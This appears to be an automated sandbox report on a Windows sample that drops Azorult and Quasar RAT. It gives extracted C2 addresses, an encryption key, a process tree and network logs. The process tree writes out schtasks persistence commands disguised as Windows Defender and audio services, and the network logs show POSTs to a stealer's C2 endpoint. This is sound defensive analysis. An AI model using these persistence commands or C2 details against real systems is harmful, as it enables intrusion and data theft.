
Analysis

  • max time kernel: 44s
  • max time network: 167s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240226-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 25/06/2024, 08:47 UTC

General

  • Target: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
  • Size: 2.0MB
  • MD5: 8f5b039c605fd7c7ef8a894b210c4460
  • SHA1: fd60eee7dd27a5f95d4a4b74b382453ee6b94b15
  • SHA256: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369
  • SHA512: 0931c19e331e6646ec939aa94f6c6ea76c468749e7353089545fee10b67ae3056d6ebc8de1f1628fe16fc75d4ee4ceafd366b5497a23a5c1d635e377fccda20e
  • SSDEEP: 24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYN:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yj

Malware Config

Extracted

  • Family: azorult
  • C2: http://0x21.in:8000/_az/

Extracted

  • Family: quasar
  • Version: 1.3.0.0
  • Botnet: EbayProfiles
  • C2:
    5.8.88.191:443
    sockartek.icu:443
  • Mutex: QSR_MUTEX_0kBRNrRz5TDLEQouI0
  • Attributes
    • encryption_key: MWhG6wsClMX8aJM2CVXT
    • install_name: winsock.exe
    • log_directory: Logs
    • reconnect_delay: 3000
    • startup_key: win defender run
    • subdirectory: SubDir

Signatures

  • Azorult
    An information stealer that was first discovered in 2016, targeting browsing history and passwords.
  • Quasar RAT
    Quasar is an open source Remote Access Tool.
  • Quasar payload (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
  • Executes dropped EXE (2 IoCs)
  • Enumerates connected drives (3 TTPs, 23 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Looks up external IP address via web service (1 IoC)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • Maps connected drives based on registry (3 TTPs, 2 IoCs)
    Disk information is often read in order to detect sandboxing environments.
  • AutoIT Executable (1 IoC)
    AutoIT scripts compiled to PE executables.
  • Suspicious use of SetThreadContext (2 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Program crash (1 IoC)
  • Runs ping.exe (1 TTP, 1 IoC)
  • Scheduled Task/Job: Scheduled Task (1 TTP, 4 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of WriteProcessMemory (19 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe"
    • Checks computer location settings
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        • Maps connected drives based on registry
        PID:2500
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      • Executes dropped EXE
      PID:1900
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        • Scheduled Task/Job: Scheduled Task
        PID:4856
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        PID:1536
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
          • Scheduled Task/Job: Scheduled Task
          PID:1680
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\80xXuzNOkXj9.bat" "
          PID:3304
          • C:\Windows\SysWOW64\chcp.com
            chcp 65001
            PID:1568
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 10 localhost
            • Runs ping.exe
            PID:4332
          • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
            "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
            PID:5012
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 2292
          • Program crash
          PID:3932
    • C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
      "C:\Users\Admin\AppData\Local\Temp\49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe"
      PID:3360
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      • Scheduled Task/Job: Scheduled Task
      PID:4964
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4792 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8
    PID:3080
  • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
    PID:3540
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      PID:3672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        PID:3632
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      PID:1412
    • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
      "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
      PID:4120
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
      • Scheduled Task/Job: Scheduled Task
      PID:3708
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1536 -ip 1536
    PID:3396

Network

  • DNS 249.197.17.2.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 249.197.17.2.in-addr.arpa IN PTR
    Response: 249.197.17.2.in-addr.arpa IN PTR a2-17-197-249.deploy.static.akamaitechnologies.com
  • DNS 58.55.71.13.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 58.55.71.13.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 18.31.95.13.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 18.31.95.13.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 157.123.68.40.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 157.123.68.40.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 107.12.20.2.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 107.12.20.2.in-addr.arpa IN PTR
    Response: 107.12.20.2.in-addr.arpa IN PTR a2-20-12-107.deploy.static.akamaitechnologies.com
  • DNS 0x21.in
    Process: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    Remote address: 8.8.8.8:53
    Request: 0x21.in IN A
    Response: 0x21.in IN A 44.221.84.105
  • POST http://0x21.in:8000/_az/
    Process: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    Remote address: 44.221.84.105:8000
    Request:
      POST /_az/ HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: 0x21.in:8000
      Content-Length: 111
      Cache-Control: no-cache
    Response:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 25 Jun 2024 08:48:08 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305288|1719305288|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • DNS 0x21.in
    Process: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    Remote address: 8.8.8.8:53
    Request: 0x21.in IN A
    Response: 0x21.in IN A 44.221.84.105
  • POST http://0x21.in/_az/
    Remote address: 44.221.84.105:8000
    Request:
      POST /_az/ HTTP/1.0
      Host: 0x21.in
      Connection: close
      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Content-Length: 111
    Response:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 25 Jun 2024 08:48:10 GMT
      Content-Type: text/html
      Connection: close
      Set-Cookie: btst=e1b446a6722e5b6c23ee92d2f0e497d8|191.101.209.39|1719305290|1719305290|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • DNS 105.84.221.44.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 105.84.221.44.in-addr.arpa IN PTR
    Response: 105.84.221.44.in-addr.arpa IN PTR ec2-44-221-84-105.compute-1.amazonaws.com
  • DNS 69.31.126.40.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 69.31.126.40.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 95.221.229.192.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 95.221.229.192.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 228.249.119.40.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 228.249.119.40.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 217.106.137.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 217.106.137.52.in-addr.arpa IN PTR
    Response: (empty)
  • DNS ip-api.com
    Remote address: 8.8.8.8:53
    Request: ip-api.com IN A
    Response: ip-api.com IN A 208.95.112.1
  • GET http://ip-api.com/json/
    Remote address: 208.95.112.1:80
    Request:
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 25 Jun 2024 08:48:39 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 297
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
  • DNS 1.112.95.208.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 1.112.95.208.in-addr.arpa IN PTR
    Response: 1.112.95.208.in-addr.arpa IN PTR ip-api.com
  • GET http://ip-api.com/json/
    Remote address: 208.95.112.1:80
    Request:
      GET /json/ HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
      Host: ip-api.com
      Connection: Keep-Alive
    Response:
      HTTP/1.1 200 OK
      Date: Tue, 25 Jun 2024 08:48:43 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 297
      Access-Control-Allow-Origin: *
      X-Ttl: 56
      X-Rl: 43
  • DNS 172.210.232.199.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 172.210.232.199.in-addr.arpa IN PTR
    Response: (empty)
  • DNS 21.236.111.52.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 21.236.111.52.in-addr.arpa IN PTR
    Response: (empty)
  • DNS chromewebstore.googleapis.com
    Remote address: 8.8.8.8:53
    Request: chromewebstore.googleapis.com IN A
    Response:
      chromewebstore.googleapis.com IN A 142.250.178.10
      chromewebstore.googleapis.com IN A 172.217.16.234
      chromewebstore.googleapis.com IN A 216.58.201.106
      chromewebstore.googleapis.com IN A 216.58.213.10
      chromewebstore.googleapis.com IN A 216.58.212.234
      chromewebstore.googleapis.com IN A 216.58.204.74
      chromewebstore.googleapis.com IN A 142.250.180.10
      chromewebstore.googleapis.com IN A 142.250.187.234
      chromewebstore.googleapis.com IN A 142.250.200.10
      chromewebstore.googleapis.com IN A 172.217.169.10
      chromewebstore.googleapis.com IN A 142.250.200.42
      chromewebstore.googleapis.com IN A 142.250.187.202
      chromewebstore.googleapis.com IN A 142.250.179.234
  • DNS chromewebstore.googleapis.com
    Remote address: 8.8.8.8:53
    Request: chromewebstore.googleapis.com IN Unknown
    Response: (empty)
  • DNS 10.178.250.142.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 10.178.250.142.in-addr.arpa IN PTR
    Response: 10.178.250.142.in-addr.arpa IN PTR lhr48s27-in-f10.1e100.net
  • DNS sockartek.icu
    Remote address: 8.8.8.8:53
    Request: sockartek.icu IN A
    Response: (empty)
  • DNS 0x21.in
    Process: 49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    Remote address: 8.8.8.8:53
    Request: 0x21.in IN A
    Response: 0x21.in IN A 44.221.84.105
  • POST http://0x21.in:8000/_az/
    Remote address: 44.221.84.105:8000
    Request:
      POST /_az/ HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Host: 0x21.in:8000
      Content-Length: 111
      Cache-Control: no-cache
      Cookie: snkz=191.101.209.39; btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305288|1719305288|0|1|0
    Response:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 25 Jun 2024 08:49:11 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: btst=5d9a12a9933a3a92a2b11aa7cecfbd6e|191.101.209.39|1719305351|1719305288|31|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
  • POST http://0x21.in/_az/
    Remote address: 44.221.84.105:8000
    Request:
      POST /_az/ HTTP/1.0
      Host: 0x21.in
      Connection: close
      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      Content-Length: 111
    Response:
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 25 Jun 2024 08:49:11 GMT
      Content-Type: text/html
      Connection: close
      Set-Cookie: btst=0060bad468e911ba8977dbf091345360|191.101.209.39|1719305351|1719305351|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
      Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
  • DNS 8.179.89.13.in-addr.arpa
    Remote address: 8.8.8.8:53
    Request: 8.179.89.13.in-addr.arpa IN PTR
    Response: (empty)
  • 5.8.88.191:8080
    svchost.exe
    260 B
    5
  • 44.221.84.105:8000
    http://0x21.in:8000/_az/
    http
    49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    541 B
    870 B
    6
    5
    HTTP Request: POST http://0x21.in:8000/_az/
    HTTP Response: 200
  • 44.221.84.105:8000
    http://0x21.in/_az/
    http
    484 B
    590 B
    5
    5
    HTTP Request: POST http://0x21.in/_az/
    HTTP Response: 200
  • 5.8.88.191:8080
    260 B
    5
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    374 B
    566 B
    5
    2
    HTTP Request: GET http://ip-api.com/json/
    HTTP Response: 200
  • 208.95.112.1:80
    http://ip-api.com/json/
    http
    466 B
    646 B
    7
    4
    HTTP Request: GET http://ip-api.com/json/
    HTTP Response: 200
  • 5.8.88.191:443
    260 B
    5
  • 5.8.88.191:8080
    260 B
    5
  • 142.250.178.10:443
    chromewebstore.googleapis.com
    tls
    1.9kB
    7.7kB
    16
    17
  • 5.8.88.191:8080
    260 B
    5
  • 44.221.84.105:8000
    http://0x21.in:8000/_az/
    http
    652 B
    791 B
    6
    5
    HTTP Request: POST http://0x21.in:8000/_az/
    HTTP Response: 200
  • 44.221.84.105:8000
    http://0x21.in/_az/
    http
    484 B
    590 B
    5
    5
    HTTP Request: POST http://0x21.in/_az/
    HTTP Response: 200
  • 5.8.88.191:8080
    260 B
    5
  • 5.8.88.191:8080
    260 B
    5
  • 5.8.88.191:8080
    260 B
    5
  • 5.8.88.191:8080
    156 B
    3
  • 8.8.8.8:53
    249.197.17.2.in-addr.arpa
    dns
    71 B
    135 B
    1
    1
    DNS Request: 249.197.17.2.in-addr.arpa
  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1
    DNS Request: 58.55.71.13.in-addr.arpa
  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1
    DNS Request: 18.31.95.13.in-addr.arpa
  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
    146 B
    1
    1
    DNS Request: 157.123.68.40.in-addr.arpa
  • 8.8.8.8:53
    107.12.20.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1
    DNS Request: 107.12.20.2.in-addr.arpa
  • 8.8.8.8:53
    0x21.in
    dns
    49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    53 B
    69 B
    1
    1
    DNS Request: 0x21.in
    DNS Response: 44.221.84.105
  • 8.8.8.8:53
    0x21.in
    dns
    49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe
    53 B
    69 B
    1
    1
    DNS Request: 0x21.in
    DNS Response: 44.221.84.105
  • 8.8.8.8:53
    105.84.221.44.in-addr.arpa
    dns
    72 B
    127 B
    1
    1
    DNS Request: 105.84.221.44.in-addr.arpa
  • 8.8.8.8:53
    69.31.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1
    DNS Request: 69.31.126.40.in-addr.arpa
  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
                            73 B
                            144 B
                            1
                            1

                            DNS Request

                            95.221.229.192.in-addr.arpa

                          • 8.8.8.8:53
                            228.249.119.40.in-addr.arpa
                            dns
                            73 B
                            159 B
                            1
                            1

                            DNS Request

                            228.249.119.40.in-addr.arpa

                          • 8.8.8.8:53
                            217.106.137.52.in-addr.arpa
                            dns
                            73 B
                            147 B
                            1
                            1

                            DNS Request

                            217.106.137.52.in-addr.arpa

                          • 8.8.8.8:53
                            ip-api.com
                            dns
                            56 B
                            72 B
                            1
                            1

                            DNS Request

                            ip-api.com

                            DNS Response

                            208.95.112.1

                          • 8.8.8.8:53
                            1.112.95.208.in-addr.arpa
                            dns
                            71 B
                            95 B
                            1
                            1

                            DNS Request

                            1.112.95.208.in-addr.arpa

                          • 8.8.8.8:53
                            172.210.232.199.in-addr.arpa
                            dns
                            74 B
                            128 B
                            1
                            1

                            DNS Request

                            172.210.232.199.in-addr.arpa

                          • 8.8.8.8:53
                            21.236.111.52.in-addr.arpa
                            dns
                            72 B
                            158 B
                            1
                            1

                            DNS Request

                            21.236.111.52.in-addr.arpa

                          • 8.8.8.8:53
                            chromewebstore.googleapis.com
                            dns
                            75 B
                            283 B
                            1
                            1

                            DNS Request

                            chromewebstore.googleapis.com

                            DNS Response

• 8.8.8.8:53  chromewebstore.googleapis.com  dns  75 B  132 B  1  1
  DNS Request: chromewebstore.googleapis.com
• 8.8.8.8:53  10.178.250.142.in-addr.arpa  dns  73 B  112 B  1  1
  DNS Request: 10.178.250.142.in-addr.arpa
• 8.8.8.8:53  sockartek.icu  dns  59 B  124 B  1  1
  DNS Request: sockartek.icu
• 8.8.8.8:53  0x21.in  dns  49aafee164d62e048c96d3a4f8d5b19427dd7850fda585c6456f277633411369_NeikiAnalytics.exe  53 B  69 B  1  1
  DNS Request: 0x21.in
  DNS Response: 44.221.84.105
• 8.8.8.8:53  8.179.89.13.in-addr.arpa  dns  70 B  144 B  1  1
  DNS Request: 8.179.89.13.in-addr.arpa
                          MITRE ATT&CK Enterprise v15


                          Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\windef.exe.log
  Filesize: 1KB
  MD5: 10eab9c2684febb5327b6976f2047587
  SHA1: a12ed54146a7f5c4c580416aecb899549712449e
  SHA256: f49dbd55029bfbc15134f7c6a4f967d6c39142c63f2e8f1f8c78fab108a2c928
  SHA512: 7e5fd90fffae723bd0c662a90e0730b507805f072771ee673d1d8c262dbf60c8a03ba5fe088f699a97c2e886380de158b2ccd59ee62e3d012dd6dd14ea9d0e50
• C:\Users\Admin\AppData\Local\Temp\80xXuzNOkXj9.bat
  Filesize: 208B
  MD5: 978f3e5547c5496199ac7fc4761ac2ed
  SHA1: 932502f4f27015578c5d833aa82f2a0a989fd233
  SHA256: adddcc9bab0f4309cbc9278a428bd2a136914c6c05edb98a2eadd1da20d60fb1
  SHA512: bbfe8b6e82e5878148e620ec2554d98a945d0e7ad358574c0a2c05cc533bbd4cf604d43b055610abc9a68580c9fcd91912dae59860dd09d462608f45eb0d6818
• C:\Users\Admin\AppData\Local\Temp\vnc.exe
  Filesize: 405KB
  MD5: b8ba87ee4c3fc085a2fed0d839aadce1
  SHA1: b3a2e3256406330e8b1779199bb2b9865122d766
  SHA256: 4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4
  SHA512: 7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2
• C:\Users\Admin\AppData\Local\Temp\windef.exe
  Filesize: 349KB
  MD5: b4a202e03d4135484d0e730173abcc72
  SHA1: 01b30014545ea526c15a60931d676f9392ea0c70
  SHA256: 7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9
  SHA512: 632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb
• C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
  Filesize: 2.0MB
  MD5: d133cfafca93f417d797b11e70a3a68d
  SHA1: 380afa4c57590677ab1bb2121e7daa9e06881f0b
  SHA256: c3f0e7badd18365f65baee9678d9110aa6f542fec497ba3044455cb7f37e0118
  SHA512: 4a39526df71cbaa53d731b85438ebf618b5ff5f204639e58ff8a867c60b17fe6e356b438746c1ed67a341d300a177144ee0ae46c0dbbd668b31f9409ea84b35b

• memory/1536-53-0x0000000006370000-0x000000000637A000-memory.dmp  Filesize: 40KB
• memory/1900-43-0x0000000004F30000-0x0000000004F96000-memory.dmp  Filesize: 408KB
• memory/1900-45-0x00000000061D0000-0x000000000620C000-memory.dmp  Filesize: 240KB
• memory/1900-44-0x0000000005D90000-0x0000000005DA2000-memory.dmp  Filesize: 72KB
• memory/1900-39-0x0000000000300000-0x000000000035E000-memory.dmp  Filesize: 376KB
• memory/1900-40-0x00000000053E0000-0x0000000005984000-memory.dmp  Filesize: 5.6MB
• memory/1900-41-0x0000000004D60000-0x0000000004DF2000-memory.dmp  Filesize: 584KB
• memory/2500-26-0x0000000000800000-0x000000000089C000-memory.dmp  Filesize: 624KB
• memory/2500-42-0x0000000000800000-0x000000000089C000-memory.dmp  Filesize: 624KB
• memory/2500-22-0x0000000000800000-0x000000000089C000-memory.dmp  Filesize: 624KB
• memory/2500-21-0x0000000000800000-0x000000000089C000-memory.dmp  Filesize: 624KB
• memory/2500-20-0x00000000008A0000-0x00000000008A1000-memory.dmp  Filesize: 4KB
• memory/3360-35-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize: 128KB
• memory/3360-27-0x0000000000400000-0x0000000000420000-memory.dmp  Filesize: 128KB
• memory/3632-76-0x0000000000020000-0x00000000000BC000-memory.dmp  Filesize: 624KB
• memory/3632-80-0x0000000000020000-0x00000000000BC000-memory.dmp  Filesize: 624KB
• memory/4120-81-0x00000000002E0000-0x0000000000300000-memory.dmp  Filesize: 128KB
• memory/4120-87-0x00000000002E0000-0x0000000000300000-memory.dmp  Filesize: 128KB
• memory/4948-18-0x0000000002280000-0x0000000002281000-memory.dmp  Filesize: 4KB
